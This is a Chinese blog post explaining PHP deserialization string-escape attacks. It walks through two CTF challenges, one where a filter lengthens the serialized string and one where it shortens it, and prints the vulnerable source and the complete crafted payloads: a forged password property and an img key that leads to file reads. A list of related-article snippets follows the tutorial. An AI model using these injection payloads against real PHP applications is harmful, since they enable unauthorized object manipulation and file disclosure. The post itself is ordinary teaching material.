php 反序列化字符串逃逸
这里总结一下反序列化字符串逃逸的知识点
反序列化字符串逃逸分为 被过滤后字符增多和字符减少的情况
这里就不讲之前的基础知识了 大家看其它师傅写的博客就可以了 很多师傅的文章写的都很细 现在直接就开始进入正题
现在先分析被过滤后字符串增多的情况 这里就那题来进行讲解
先看字符串增多的情况
[CTFSHOW]Web1此夜圆
给出了源代码
<?php
error_reporting(0);
class a
{
public $uname;
public $password;
public function __construct($uname,$password)
{
$this->uname=$uname;
$this->password=$password;
}
public function __wakeup()
{
if($this->password==='yu22x')
{
include('flag.php');
echo $flag;
}
else
{
echo 'wrong password';
}
}
}
function filter($string){
return str_replace('Firebasky','Firebaskyup',$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>
一眼顶针
思路很简单 就是让password为yu22x 就和包含flag文件然后输出flag才可以
这里把password写死了 为1
但是这里用了filter函数 是想序列化之后的东西 过滤了一下
然后才进行了反序列化 这里是把Firebasky 替换为了Firebaskyup 属于字符串增多的情况
字符串增多的情况很简单就是把 我们需要的 反序列化之后的数据 写进去 然后把后面password为1 的数据挤出来可以
先随便看一下 序列化之后的东西
我们先传入个1 方便我们更加直观的分析
O:1:"a":2:{s:5:"uname";s:1:"1";s:8:"password";i:1;}
然后现在明确思路就是想把
";s:8:"password";i:1;}
这些东西挤出去
拼接我们想要的序列化的数据
我们想要的序列化的数据就是
";s:8:"password";s:5:"yu22x";}
因为把它挤出去之后我们就要紧接着去拼接它 使它可以正常的反序列化
所以现在我们要给 我们想要拼接的序列化数据腾位置 先计算他的数量 为30
然后没过滤一次就会挤出来两个字符所以我们就可以 使它过滤十五次就可以腾出来我们想要序列化的数据的位置了
然后拼接上我们伪造的反序列化的数据
看结果更加的明显 应该是可以说恍然大悟
所以payload就为
FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}
看经过过滤后的数据
O:1:"a":2:{s:5:"uname";s:165:"FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}
直接来分析过滤后的数据可能大家就能明白为什么要想上面那样做了
先来看一下
FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup
的数量为 165 正好为165
为什么为 165呢 因为
FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}
然后后面就是我们拼接的数据了
;s:8:"password";s:5:"yu22x";}
我们来分析一下过滤后的数据的结构
现在 序列化之后的属性的数量为2 所以他现在就会读取 前两个属性
FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup";s:8:"password";s:5:"yu22x";}
后面的那个s:8:"password";i:1;} 就会被挤出来了
那现在打印一下反序列化之后的结果把
var_dump(unserialize('O:1:"a":2:{s:5:"uname";s:165:"FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}'));
class __PHP_Incomplete_Class#1 (3) {
public $__PHP_Incomplete_Class_Name =>
string(1) "a"
public $uname =>
string(165) "FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup"
public $password =>
string(5) "yu22x"
}
这个字符串增多的情况 挤出来的还是比较简单的
接着来看字符串减少的情况
还是用例题来解释
[安洵杯 2019]easy_serialize_php
同样给出了源代码
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
首先还是分析代码
先找漏洞点把
echo file_get_contents(base64_decode($userinfo['img']));
就是读取 base64解码之后的文件读的是 $userinfo['img']
那看userinfo 是怎么来的
反序列化之后的 $serialize_info
看 serialize_info 是怎么来的
filter(serialize($_SESSION)) 序列化
$_SESSION
过滤来的
那就先看一下过滤把 把上面几个限制的字符过滤为了空 所以就是字符串减少的情况
现在就来看一下具体的SESSION是什么把
这里定义了 session user 和session function
但是呢 这里我们想要控制的是 session img
但是如果我们直接get的方式传入 img_path 的话 他就会进行 sha1 加密 导致 base64解码的时候就会产生错误 ’
所以我们不能够通过这种方式来控制 session img
就是要通过 反序列化字符串逃逸才可以
现在我们要注意 extract($_POST);可以覆盖变量
还是跟之前一样 先随便写个数据然后 方便我们观察分析
通过变量覆盖来 更改user 和function的值
_SESSION[user]=1&_SESSION[function]=2
a:3:{s:4:"user";s:1:"1";s:8:"function";s:1:"2";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
我们可以控制 1 和 2
也就是这个
_SESSION[user]=php&_SESSION[function]=2
a:3:{s:4:"user";s:3:"";s:8:"function";s:1:"2";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
让他过滤一下看看效果
所以现在的思路就是让它全部替换为空把后面的东西 当作user的变量值 然后再后面 “2”的位置 写我们想要构造的 逃逸的字符串就可以 现在 a 类的是有三个属性 所以只会接受前三个值 最后一个 固定的img 就会被忽略
现在我们先计算一下 两个可控点中间的数量
";s:8:"function";s:1:"
为 22
但是无论通过三的倍数 还是四的倍数 或者是组合起来 的 就 构成不了 22
但是 这里我们 “2“是可控的 所以这里我们可以 加上两个字符变为 24个字符 就可以 了
";s:8:"function";s:1:"22
通过 写入 六个 flag 现在看一下效果
a:3:{s:4:"user";s:24:"";s:8:"function";s:42:"1";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
我们发现
这个长度为 24
然后后面就为 第二个属性 但是前面的属性是有三个 然后 我们这里只有两个 所以我们随便在后面添加一个属性就可以了
那我们现在输入
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=1";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";s:3:"iag";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
就会变成这个样子
a:3:{s:4:"user";s:24:"";s:8:"function";s:42:"1";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";s:3:"iag";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
然后就可以进行反序列化了
因为这几个base64编码之后都是20 所以直接改文件名就可以了
总结
字符串增多的情况
就是先计算想要拼接的数据的数量 然后拼接进去 把后来的挤出去就可
字符串减少的情况 就是 计算可控前后的之间字符串的数量 然后把后面一部分序列化之后的东西全部当键值
再在后面拼接自己恶意构造的序列化之后的数据
总的来说还得考具体情况具体分析
php 反序列化字符串逃逸的更多相关文章
- PHP反序列化字符串逃逸
通过CTF比赛了解PHP反序列化,记录自己的学习. 借用哈大佬们的名言 任何具有一定结构的数据,如果经过了某些处理而把结构体本身的结构给打乱了,则有可能会产生漏洞. 0CTF 2016piapiapi ...
- 0CTF-2016-piapiapia-PHP反序列化长度变化尾部字符串逃逸
0X00 扫描一下网站目录,得到网站源码,这里说下工具使用的是dirmap,亲测御剑不好用... 0x01 审计源码: index.php <?php require_once('class.p ...
- 【转载】 C#使用Newtonsoft.Json组件来反序列化字符串为对象
在Asp.Net网站开发的过程中,很多时候会遇到对象的序列化和反序列化操作,Newtonsoft.Json组件是专门用来序列化和反序列化操作的一个功能组件,引入这个DLL组件后,就可使用JsonCon ...
- HTML基础之JS中的序列化和反序列化-----字符串的json类型与字典之间的相互转换
前端向后端传递数据的时候不能直接传递对象(如,字典),只能发字符串,Jason就是一种字符串所以前端向后端发送数据的时候,需要将对象转换成字符串 如果前端向后端发送的是json类型,需要通过JSON. ...
- Newtonsoft 反序列化字符串
string json=“[{“name”:”zhangsan”,”age”:”12”},{“name”:”zhangsan”,”age”:”12”}]” 方法1: JArray arr = (JAr ...
- [0CTF 2016] piapiapia
一道非常有意思的反序列化漏洞的题目 花费了我不少时间理解和记忆 这里简单记录其中精髓 首先打开是一个登陆页面 dirsearch扫描到了www.zip源码备份 update.php <?php ...
- 细说强网杯Web辅助
本文首发于“合天智汇”公众号 作者:Ch3ng 这里就借由强网杯的一道题目“Web辅助”,来讲讲从构造POP链,字符串逃逸到最后获取flag的过程 题目源码 index.php 获取我们传入的user ...
- 安恒DASCTF 四月战 WP
web1 打开提就是源码审计 考点:反序列化POP链.反序列化字符串逃逸 show_source("index.php"); function write($data) { ret ...
- ctfshow_djb杯
桐桑又开始摸鱼了 ctfshow的比赛整的一手好活.djb杯. web1_veryphp 打开就是源码: 1 <?php 2 error_reporting(0); 3 highlight_fi ...
- 2021 数字四川创新大赛WriteUp
数字四川初赛+复赛wp Web easyphp http://111.9.220.114:50006/.index.php.swp 备份文件泄漏 <?php #error_reporting(0 ...
随机推荐
- JZOJ 1389. 玩诈欺的小杉
思路 考虑一个点要不要翻,如果它左边的点为 \(1\),那么它必须翻 所以我们可以从左往右一列一列地翻 先枚举第 \(0\) 列的状态 然后之后的列就确定了 判断一下最后一列是不是 \(0\) 就行了 ...
- 权限维持之:DSRM 域控权限维持
目录 1 修改 DSRM 密码 2 DSRM 域后门操作过程 3 DSRM 域后门防御 目录服务恢复模式(DSRM,Directory Services Restore Mode),是Windows服 ...
- trollcave-v1-2
trollcave-v1-2 目录 trollcave-v1-2 1 信息收集 1.1 端口扫描 1.2 后台目录扫描 1.3 收集网站相关信息 1.3.1 收集网站用户名与角色信息 1.3.2 收集 ...
- 记一次 .NET某家装ERP系统 内存暴涨分析
一:背景 1. 讲故事 前段时间微信上有一位老朋友找到我,说他的程序跑着跑着内存会突然爆高,有时候会下去,有什么会下不去,怀疑是不是某些情况下存在内存泄露,让我帮忙分析一下,其实内存泄露方面的问题还是 ...
- element-ui/lib/style.css in ./src/main.js 解决方案
在node_modules 中 找到element-ui/lib路径 创建style.css文件 就好了
- Kafka主题,分区,副本介绍
介绍 今天分享一下kafka的主题(topic),分区(partition)和副本(replication),主题是Kafka中很重要的部分,消息的生产和消费都要以主题为基础,一个主题可以对应多个分区 ...
- snowland-smx密码算法库
snowland-smx密码算法库 一.snowland-smx密码算法库的介绍 snowland-smx是python实现的国密套件,对标python实现的gmssl,包含国密SM2,SM3,SM4 ...
- dom4j解析和生成xml文件
解析xml大致步骤: 1: 创建SAXReader: 2: 使用SAXReader解析指定的xml文档信息,并返回对应Document对象.Document对象中就包含了该xml文中的所有信息以及结构 ...
- ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost:3306' (10061)
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost:3306' (10061) 报错原因:电脑之前有个5.0.2版本的mys ...
- K8s集群版本升级
k8s组件升级流程: 升级主管理节点→升级其他管理节点→升级工作节点 首先备份主管理节点的etcd,检查版本号,为了保证版本的兼容性,跨度最好不要超过两个版本. [root@master ~]# ku ...